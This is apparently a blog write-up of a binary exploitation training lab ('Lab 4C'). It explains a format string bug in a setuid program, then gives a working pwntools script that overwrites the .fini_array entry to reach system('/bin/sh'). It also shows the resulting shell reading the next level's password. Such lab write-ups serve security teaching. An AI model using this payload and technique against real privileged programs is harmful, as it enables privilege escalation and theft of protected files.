---
layout: post
title: Modern Binary Exploitation - Lab 4C
published: True
---

For this lab, we are given a program and its corresponding source code:

{% highlight C %}
/*
 *   Format String Lab - C Problem
 *   gcc -z execstack -z norelro -fno-stack-protector -o lab4C lab4C.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PASS_LEN 30

int main(int argc, char *argv[])
{
    char username[100] = {0};
    char real_pass[PASS_LEN] = {0};
    char in_pass[100] = {0};
    FILE *pass_file = NULL;
    int rsize = 0;

    /* open the password file */
    pass_file = fopen("/home/lab4B/.pass", "r");
    if (pass_file == NULL) {
        fprintf(stderr, "ERROR: failed to open password file\n");
        exit(EXIT_FAILURE);
    }

    /* read the contents of the password file */
    rsize = fread(real_pass, 1, PASS_LEN, pass_file);
    real_pass[strcspn(real_pass, "\n")] = '\0';  // strip \n
    if (rsize != PASS_LEN) {
        fprintf(stderr, "ERROR: failed to read password file\n");
        exit(EXIT_FAILURE);
    }

    /* close the password file */
    fclose(pass_file);

    puts("===== [ Secure Access System v1.0 ] =====");
    puts("-----------------------------------------");
    puts("- You must login to access this system. -");
    puts("-----------------------------------------");

    /* read username securely */
    printf("--[ Username: ");
    fgets(username, 100, stdin);
    username[strcspn(username, "\n")] = '\0';    // strip \n

    /* read input password securely */
    printf("--[ Password: ");
    fgets(in_pass, sizeof(in_pass), stdin);
    in_pass[strcspn(in_pass, "\n")] = '\0';      // strip \n

    puts("-----------------------------------------");

    /* log the user in if the password is correct */
    if(!strncmp(real_pass, in_pass, PASS_LEN)){
        printf("Greetings, %s!\n", username);
        system("/bin/sh");
    } else {
        printf(username);
        printf(" does not have access!\n");
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
{% endhighlight %}

The source code comment reveals that it is compiled with **RELRO** completely disabled. `checksec` confirms this.

{% highlight bash %}
lab4C@warzone:/levels/lab04$ gdb -q ./lab4C
Reading symbols from ./lab4C...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : disabled
{% endhighlight %}

In addition, we see that there is a format string vulnerability that is triggered in the second to last `printf()` call:

{% highlight c %}
printf(username);
{% endhighlight %}

This format string vulnerability should give us an arbitrary write-what-where primitive.

Because RELRO is fully is disabled, we are able to overwrite a `.fini_array` entry. For the uninitiated, the `.fini_array` is the new replacement for the old `.dtors` section and is just an array of pointers to destructors that are called just before the `main()` function exits or returns. 
**All** binaries that are compiled with GCC contain either a `.fini_array` or a `.dtors` section. 

We can see that the `.fini_array` section in our binary contains only 1 entry.

{% highlight bash %}
lab4C@warzone:/levels/lab04$ objdump -s -j .fini_array ./lab4C

./lab4C:     file format elf32-i386

Contents of section .fini_array:
 8049de4 e0870408                             ....         
{% endhighlight %}

In addition, if we look at the disassembly of `main()` we can see a good target to redirect our flow of execution to:

{% highlight text %}
0x08048acb <+670>:	call   0x8048720 <strncmp@plt>
0x08048ad0 <+675>:	test   eax,eax
0x08048ad2 <+677>:	jne    0x8048af9 <main+716>
0x08048ad4 <+679>:	lea    eax,[esp+0x94]
0x08048adb <+686>:	mov    DWORD PTR [esp+0x4],eax
0x08048adf <+690>:	mov    DWORD PTR [esp],0x8048cc4
0x08048ae6 <+697>:	call   0x8048660 <printf@plt>
0x08048aeb <+702>:	mov    DWORD PTR [esp],0x8048cd4
0x08048af2 <+709>:	call   0x80486d0 <system@plt>
{% endhighlight %}

To summarize, we will use the format string vulnerability to overwrite the `.fini_array` entry to direct execution to the `0x08048ad4` basic block which will eventually call `system("/bin/sh")`, giving us a shell.

The following script achieves this. 

## Solution

{% highlight python %}
#!/usr/bin/env python

from pwn import *
import sys

'''
python -c 'print "AAAA"+".%08x"*3+".%35508x%hn"+"\n"+"BB"+"\xe4\x9d\x04\x08"+"\n"' | ./lab4C
'''
def exploit(r):
  username = "AAAA"+".%08x"*3+".%35508x%hn"+"\n"
  password = "BB"+"\xe4\x9d\x04\x08"+"\n"
  print r.recv(1024)
  r.send(username) 
  r.send(password)
  r.interactive()

if __name__ == "__main__":
  log.info("For remote: %s HOST PORT" % sys.argv[0])
  if len(sys.argv) > 1:
    r = remote(sys.argv[1], int(sys.argv[2]))
    exploit(r)
  else:
    r = process(['/levels/lab04/lab4C'])
    print util.proc.pidof(r)
    pause()
    exploit(r)
{% endhighlight %}

{% highlight bash %}
                                                                                                                                       42420000 does not have access!
Greetings, !
lab4A  lab4A.c    lab4B  lab4B.c    lab4C  lab4C.c
$ cat /home/lab4B/.pass
bu7_1t_w4sn7_brUt3_f0rc34b1e!
{% endhighlight %}

## Addendum
As a side note, one obstacle I did have to overcome was being able to debug this suid binary in GDB.
When suid binaries run in GDB, they do so without their elevated permissions. 
Therefore, `lab4C` wasn't able to open the `/home/lab4B/.pass` file while being debugged, causing the program to terminate prematurely.
To bypass this issue, I created a fake password file, `/tmp/lab4c/hellow`, set a breakpoint at the `fopen()` call, ran the program until it hit the breakpoint, and patched the value of the string.

{% highlight bash %}
gdb-peda$ b *main+230
Breakpoint 1 at 0x8048913
gdb-peda$ r
Starting program: /levels/lab04/lab4C 
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x0 
EDX: 0xbffff656 --> 0x0 
ESI: 0x1c 
EDI: 0xbffff654 --> 0x0 
EBP: 0xbffff6f8 --> 0x0 
ESP: 0xbffff5e0 --> 0x8048bc2 ("/home/lab4B/.pass")
EIP: 0x8048913 (<main+230>:	call   0x8048710 <fopen@plt>)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80488f9 <main+204>:	mov    DWORD PTR [esp+0xf8],0x0
   0x8048904 <main+215>:	mov    DWORD PTR [esp+0x4],0x8048bc0
   0x804890c <main+223>:	mov    DWORD PTR [esp],0x8048bc2
=> 0x8048913 <main+230>:	call   0x8048710 <fopen@plt>
   0x8048918 <main+235>:	mov    DWORD PTR [esp+0xfc],eax
   0x804891f <main+242>:	cmp    DWORD PTR [esp+0xfc],0x0
   0x8048927 <main+250>:	jne    0x804895a <main+301>
   0x8048929 <main+252>:	mov    eax,ds:0x8049f20
Guessed arguments:
arg[0]: 0x8048bc2 ("/home/lab4B/.pass")
arg[1]: 0x8048bc0 --> 0x682f0072 ('r')
[------------------------------------stack-------------------------------------]
0000| 0xbffff5e0 --> 0x8048bc2 ("/home/lab4B/.pass")
0004| 0xbffff5e4 --> 0x8048bc0 --> 0x682f0072 ('r')
0008| 0xbffff5e8 --> 0x0 
0012| 0xbffff5ec --> 0x0 
0016| 0xbffff5f0 --> 0x0 
0020| 0xbffff5f4 --> 0x0 
0024| 0xbffff5f8 --> 0x0 
0028| 0xbffff5fc --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048913 in main ()
gdb-peda$ patch 0x8048bc2 "/tmp/lab4c/hellow"
Written 17 bytes to 0x8048bc2
{% endhighlight %} 
